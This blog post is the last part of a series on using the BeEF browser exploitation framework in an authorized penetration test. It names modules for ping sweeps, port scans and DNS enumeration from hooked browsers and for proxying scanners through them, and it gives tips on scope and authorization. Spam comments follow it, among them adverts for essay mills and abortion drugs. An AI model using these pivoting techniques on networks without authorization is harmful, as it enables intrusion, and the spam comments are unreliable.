Saturday, June 23, 2012

BeEF In a Real World Pen Test - Part 4: BeEFy Desserts

Welcome to the final installment of BeEF in a real world pentest.

You can read the previous installments in our blog.

But, to recap: in Part 1, we demonstrated how to build the con for our fictional target company Contoso. In Part 2, we set the hooks for our targets and got zombies on the line. In Part 3, we gathered information from our hooked targets and started exploiting that data.

In this episode, we will discuss how we can pivot and hop further inside the internal network and how we can foolproof our encounters to conduct a professional pen test within a given scope and time frame.

Based on our previous work, we have a slew of hooked browsers and we have penetrated the first level of defenses. At this point, we want to leverage our hooked browsers to pivot and hop inside the network.

Hopping Inside

We start off by identifying the computers in the same network of the hooked browsers. Since we already have the browser’s internal IP (refer to part 3), we run our scan against its class C network using the ping sweep modules. For firefox, we use the “network/Ping Sweep” module which does not require user interaction, and for other browsers we use the “network/Ping Sweep Java”.

Additionally, we fingerprint common appliances on the same network of the hooked browser using the “network/Internal Network Fingerprinting” module. This module will try to enumerate common appliances (printers, routers, media servers, ...etc) on some default IP address using pre-defined file signatures.

After we have identified some live IPs, we start scanning those IPs for open ports. Using the “network/Port Scanner” module, we can port scan internal IPs of a hooked browser (Firefox, and Chrome only). The module uses WebSockets and HTML5 techniques to conduct the scan.

To further investigate our internal targets, we can run a DNS enumeration scan on the internal network via the “Network/DNS Enumeration” module. The DNS enumeration module uses dictionary and timing attacks to identify common internal domain names such as (intranet, mail, print, ...etc). This can be very helpful in identifying internal resources.

Now that we have a good understanding of the internal network, the last step is to scan internal applications for further vulnerabilities. Using the “Tunneling Proxy” extension, we can chain our browser, a web vulnerability scanner such as Burp Suite and the hooked browser in a proxy chain. This video by Michele “antisnatchor” Orru best describes how this can be achieved.

We can even craft and send raw requests proxied via a hooked browser using the Rider extension tab. This allows us to conduct convoluted attacks on the internal web servers.

It is worth mentioning,  we can do more pivoting and hopping by leveraging the meterpreter shells we have on some non-important hosts and the compromised test server (see part 3) but that is beyond the scope of this text.


Now that we have fully penetrated our target, we want to point out some of the proofing tips that will help us keep the pen test clean and professional.

The first thing we need to take care of is preventing backfire from disgruntled employees and/or target sys admins. The last thing we want is to get hacked by our customers! To secure our own perimeter, we take a few precautions:
  • Limit the admin UI interface of BeEF to the internal IPs only that we actually use to administer BeEF. This can be achieved from the main config.yaml file by setting the “permitted_ui_subnet” to match the administration internal subnet.
  • Setup firewall rules on the BeEF server to block all external access except for the web port, metasploit payload delivery port and browser autopwn port (if applicable).

For larger numbers of hooked browsers, the performance of the default underlying DB driver (i.e. SQLite) drops dramatically leading sometimes to unexpected behaviours. If you are planning to have a large number of hooked browsers, use BeEF in MySQL DB mode. This can be configured in the main config.yaml file under “database:driver:” section. Also, changing the update timeout value to 1-2 seconds in updates.js (based on the connection speed) might give a performance boost.

It goes without saying that we need to have our written authorization of the penetration test. What is sometimes missing are small details that might cause problems. The following are examples of sensitive “grey” interactions that should be explicitly declared in the scope and agreed upon a priori:
  • Sending buzzing phishing emails (especially to or about C-Level execs).
  • Capturing employees personal information and using it to gain access to their corporate machines.
  • Extracting wireless keys from corporate machines given that there might be some personal wireless keys on laptops or BYOD-style devices.

In order to keep the scope of the pen test from creeping to personal grounds, we can take some more precautions:
  • Limit the hooking subnets to only the IP ranges of the target company to prevent accidental or out of scope hooking of browsers. However, this will severely limit smartphones hooking as they will most likely get hooked via their 3G/4G interface.
  • Limit the hooking machines to only ones with a predefined set of referrer URLs that we use. This is a weak limitation but might be handy in case of mobile devices.
  • Do not save exported wireless keys that do not belong to the corporate wireless.
  • Do not save or use private photos and/or videos exported from the users’ profiles or harvested in the recon phase, as this is not corporate related and probably off limits.

Now that we have successfully penetrated the perimeter, hopped inside the internals of the network, and secured ourselves from backfire and scope creep, we are ready to write the report focusing on how our client will be able to fix the issues through which we were able go gain this access. 

Special thanks to Heather Pilkington for helping me out through this series, Michele Orru for his insightful comments, and all BeEF team for their great support!


  1. earn money online without investment
    The first time I saw this website, I was immediately attracted to zoom. Moreover, all the information is in my opinion quite interesting and intriguing. I hope you also visit my website and pass judgment on my website. Thanks.

  2. * Thanks for sharing the information *
    * Jual Jual Obat Aborsi Ampuh Obat Aborsi,,
    * Obat Penggugur Kandungan,,

  3. I wanted to become a chief in high school so I like to cook such things. I only remember that I entered great college thanks to my admission essay I wrote using this useful info

  4. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Selenium with python Training in Electronic City

  5. DNS is the domain name resolution system that stands for Domain Name Servers. Currently, in addition to Google DNS is widely used
    Vietnam remy hair
    Vietnam human hair

  6. Softhax
    Find best android iOS apps free now. Install them on your phone with easily simple steps. Free android games, free applications.

  7. The article you have shared here very awesome. I really like and appreciated your work. I read deeply your article, the points you have mentioned in this article are useful
    vex 3

  8. طرق التخلص من الحشرات المنزلية يلاحظ ازدياد أعداد وأنواع الحشرات التي تدخل إلى المنازل مع بدء فصل الصيف بحثاً عن الغذاء والطعام، ويمكن للبعض منها أن تستوطن أحد زوايا أو قطع أثاث المنزل وتتكاثر هناك، الأمر الذي يؤدي إلى إصابة سكان المنزل من البالغين والأطفال بالأمراض أو الانزعاج، خاصةً إذا كانت هذه الحشرات من الأنواع الحاملة والناقلة للأمراض المعدية، ممّا يضطر سكان المنزل إلى اتباع كافة التدابير اللازمة للقضاء عليها.

    شركة مكافحة حشرات بالاحساء
    شركة مكافحة حشرات بالخرج
    شركة مكافحة حشرات بالقطيف

  9. Currently it looks like article is the top blogging platform available right now.
    While using any application if there is any issue that occurs like hacking and the application is processing slow then contact Mcafee activates to get the instant solution.

  10. We ensure all write research paper online processes, our company meet a certain prescribed and strict criteria to ascertain none of the research paper writer services quality is compromised.

  11. Students need not struggle so much with their assignments and they should seek our research paper assistance when they can easily get professional research paper help online from us.

  12. We offer research paper help online services, term paper help and dissertation writing help specialized in delivering original, custom-written and creative pay for research papers services which are delivered within the deadline.

  13. Really very informative and creative. This sharing concept is a good way to enhance knowledge.

  14. بغض النظر عن نوع مبنى المباني المصنوع من الطوب الخام أو المباني الأسمنتية حيث في حالة المباني ذات الطوب الخام التي تعمل على تآكل الأثاث وبالتالي قد يؤدي إلى انهيار منزل مشراحه إما في حالة المباني الأسمنتية شركة مكافحة حشرات بسكاكا
    شركة رش مبيدات بسكاكا
    المبيدات الحشرية الكيميائية
    افضل شركة مكافحة حشرات

  15. I am happy with your article,your website is pretty good. Many articles are very useful for everyone. I am sure your website will grow in the future.

    If you are buying an Hp printer or dont know how to use the printer properly then don't be provides you the best method to use the printer.